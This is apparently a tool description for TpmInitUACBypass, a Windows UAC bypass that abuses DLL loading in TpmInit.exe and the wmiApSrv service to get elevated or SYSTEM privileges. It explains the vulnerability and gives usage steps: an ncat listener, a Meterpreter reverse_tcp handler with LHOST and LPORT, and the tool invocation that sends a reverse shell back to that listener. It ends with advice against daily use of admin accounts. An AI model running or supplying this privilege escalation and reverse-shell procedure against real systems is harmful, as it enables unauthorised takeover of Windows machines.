TpmInitUACBypass is A tool to Bypass User Account Control (UAC), to get a High Integrity (or SYSTEM) Reversed Command shell, a reversed PowerShell session, or a Reversed Meterpreter session. When TpmInit.exe starts, it first tries to load the wbemcomn.dll within C:\Windows\System32\wbem. This DLL cannot be found in that folder, so it tries to load the DLL again, but then in C:\Windows\System32. This tool exploits this DLL loading vulnerability within TpmInit.exe, which runs auto-elevated by default. Same issue also applies to the WMI Performance Adapter service (wmiApSrv) which runs with SYSTEM privileges. So while we can use TpmInit.exe to get Elevated priviliges, we can also use it to start the wmiApSrv service, and get a SYSTEM shell using our custom DL
This version has been succesfully tested on Windows 8.1 x64 and Windows 10 x64 (Version 1511).
+ Metasploit Framework
first download TpmInitUACBypass.zip
* setup a remote Netcat, Ncat or Meterpreter(x64) listener
ncat -lvp 443
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 10.0.0.1
set LPORT 443
exploit -j (see a picture)
Then open TpmInitUACBypass.exe <Remote Listener IP> <Port> <powershell, cmd or msf> <system>
Strong Advice: Do not use accounts with Administrative privileges for daily computer usage!